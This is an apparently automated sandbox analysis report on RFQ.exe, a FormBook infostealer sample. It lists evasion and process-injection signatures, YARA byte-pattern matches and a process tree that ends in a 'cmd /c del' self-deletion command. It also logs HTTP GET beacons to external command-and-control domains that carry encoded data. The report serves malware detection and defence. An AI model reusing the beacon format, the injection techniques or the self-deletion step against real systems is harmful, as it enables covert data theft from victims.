Loading ...

Play interactive tourEdit tour

Analysis Report RFQ.exe

Overview

General Information

Sample Name:RFQ.exe
Analysis ID:299614
MD5:3378417b0ce72de02f6d20add03024e4
SHA1:23e5e71afa92c5ff75e5dc899ecc756f841b8342
SHA256:8f5161a12c4c8522e00196b39b3ee82c620da9914f8b861d6eee31cb8662d18b
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • RFQ.exe (PID: 6524 cmdline: 'C:\Users\user\Desktop\RFQ.exe' MD5: 3378417B0CE72DE02F6D20ADD03024E4)
    • RFQ.exe (PID: 6692 cmdline: {path} MD5: 3378417B0CE72DE02F6D20ADD03024E4)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 5920 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 4564 cmdline: /c del 'C:\Users\user\Desktop\RFQ.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x930f0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9335a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0xbf910:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0xbfb7a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9ee7d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0xcb69d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x9e969:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0xcb189:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x9ef7f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0xcb79f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x9f0f7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xcb917:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93d72:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0xc0592:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x9dbe4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xca404:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x94a6b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0xc128b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0xa4b1f:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xd133f:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xa5b22:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0xa1c01:$sqlite3step: 68 34 1C 7B E1
    • 0xa1d14:$sqlite3step: 68 34 1C 7B E1
    • 0xce421:$sqlite3step: 68 34 1C 7B E1
    • 0xce534:$sqlite3step: 68 34 1C 7B E1
    • 0xa1c30:$sqlite3text: 68 38 2A 90 C5
    • 0xa1d55:$sqlite3text: 68 38 2A 90 C5
    • 0xce450:$sqlite3text: 68 38 2A 90 C5
    • 0xce575:$sqlite3text: 68 38 2A 90 C5
    • 0xa1c43:$sqlite3blob: 68 53 D8 7F 8C
    • 0xa1d6b:$sqlite3blob: 68 53 D8 7F 8C
    • 0xce463:$sqlite3blob: 68 53 D8 7F 8C
    • 0xce58b:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.487639591.0000000002D20000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.487639591.0000000002D20000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 14 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.RFQ.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.RFQ.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.RFQ.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        1.2.RFQ.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.RFQ.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: RFQ.exeVirustotal: Detection: 39%Perma Link
          Source: RFQ.exeReversingLabs: Detection: 52%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.487639591.0000000002D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.272791500.00000000014B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.486767546.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.272273185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.272819143.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: RFQ.exeJoe Sandbox ML: detected
          Source: 1.2.RFQ.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 4x nop then pop edi1_2_0040E417
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 4x nop then pop edi1_2_00417D67
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi6_2_02D2E417
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi6_2_02D37D67

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49758
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49759
          Source: global trafficHTTP traffic detected: GET /nl8/?U2Mxo=NjbdFdNXbTB4lJh0&uVg8=avnYvnpnkxtYXaIAR4Sou8XebpuM8ZPguIFoIYSggFPmc0ZkmARVxbtEvojTkK4BJiWC HTTP/1.1Host: www.coraldetectionsystem.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nl8/?U2Mxo=NjbdFdNXbTB4lJh0&uVg8=PV6EDVNabin3NIVY5sUI0Pllu5c6yNLvkx9kNMhStM/z3GoJuybC/uVWyMg9/hl+Uhg9 HTTP/1.1Host: www.extremecouponing.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nl8/?uVg8=b5d7zoT3NXDO9B+aMaag/yv2EEPdk6AXDS+7RXKAWurK5qZTM+upVYOsqeSxSkAcBcVP&U2Mxo=NjbdFdNXbTB4lJh0 HTTP/1.1Host: www.athomecovidcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewIP Address: 199.34.228.77 199.34.228.77
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: WEEBLYUS WEEBLYUS
          Source: global trafficHTTP traffic detected: GET /nl8/?U2Mxo=NjbdFdNXbTB4lJh0&uVg8=avnYvnpnkxtYXaIAR4Sou8XebpuM8ZPguIFoIYSggFPmc0ZkmARVxbtEvojTkK4BJiWC HTTP/1.1Host: www.coraldetectionsystem.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nl8/?U2Mxo=NjbdFdNXbTB4lJh0&uVg8=PV6EDVNabin3NIVY5sUI0Pllu5c6yNLvkx9kNMhStM/z3GoJuybC/uVWyMg9/hl+Uhg9 HTTP/1.1Host: www.extremecouponing.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nl8/?uVg8=b5d7zoT3NXDO9B+aMaag/yv2EEPdk6AXDS+7RXKAWurK5qZTM+upVYOsqeSxSkAcBcVP&U2Mxo=NjbdFdNXbTB4lJh0 HTTP/1.1Host: www.athomecovidcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.coraldetectionsystem.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 17 Oct 2020 07:10:12 GMTServer: ApacheSet-Cookie: is_mobile=0; path=/; domain=www.coraldetectionsystem.comVary: X-W-SSL,User-AgentSet-Cookie: language=en; expires=Sat, 31-Oct-2020 07:10:12 GMT; Max-Age=1209600; path=/Set-Cookie: gdpr-kb=1; expires=Tue, 15-Oct-2030 07:10:12 GMT; Max-Age=315360000; path=/Cache-Control: privateX-Host: pages5.sf2p.intern.weebly.netX-UA-Compatible: IE=edge,chrome=1Content-Length: 3803Content-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 67 64 70 72 2f 67 64 70 72 73 63 72 69 70 74 2e 6a 73 3f 62 75 69 6c 64 54 69 6d 65 3d 31 36 30 32 38 36 39 39 33 32 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 31 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 2f 6e 6f 6e 65 2e 69 63 6f 22 20 2f 3e 0a 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 72 6f 78 69 6d 61 20 4e 6f 76 61 27 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 22 29 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 Da
          Source: explorer.exe, 00000002.00000000.256204691.00000000089F8000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.256304478.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.487639591.0000000002D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.272791500.00000000014B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.486767546.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.272273185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.272819143.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.487639591.0000000002D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.487639591.0000000002D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.272791500.00000000014B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.272791500.00000000014B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.486767546.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.486767546.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.272273185.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.272273185.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.272819143.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.272819143.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00419D50 NtCreateFile,1_2_00419D50
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00419E00 NtReadFile,1_2_00419E00
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00419E80 NtClose,1_2_00419E80
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00419F30 NtAllocateVirtualMemory,1_2_00419F30
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00419DA2 NtCreateFile,1_2_00419DA2
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00419E4B NtReadFile,1_2_00419E4B
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00419F2A NtAllocateVirtualMemory,1_2_00419F2A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF95D0 NtClose,LdrInitializeThunk,6_2_04DF95D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9540 NtReadFile,LdrInitializeThunk,6_2_04DF9540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF96D0 NtCreateKey,LdrInitializeThunk,6_2_04DF96D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF96E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04DF96E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9650 NtQueryValueKey,LdrInitializeThunk,6_2_04DF9650
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04DF9660
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9FE0 NtCreateMutant,LdrInitializeThunk,6_2_04DF9FE0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9780 NtMapViewOfSection,LdrInitializeThunk,6_2_04DF9780
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9710 NtQueryInformationToken,LdrInitializeThunk,6_2_04DF9710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9840 NtDelayExecution,LdrInitializeThunk,6_2_04DF9840
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9860 NtQuerySystemInformation,LdrInitializeThunk,6_2_04DF9860
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF99A0 NtCreateSection,LdrInitializeThunk,6_2_04DF99A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_04DF9910
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9A50 NtCreateFile,LdrInitializeThunk,6_2_04DF9A50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF95F0 NtQueryInformationFile,6_2_04DF95F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9560 NtWriteFile,6_2_04DF9560
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DFAD30 NtSetContextThread,6_2_04DFAD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9520 NtWaitForSingleObject,6_2_04DF9520
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9670 NtQueryInformationProcess,6_2_04DF9670
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9610 NtEnumerateValueKey,6_2_04DF9610
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF97A0 NtUnmapViewOfSection,6_2_04DF97A0
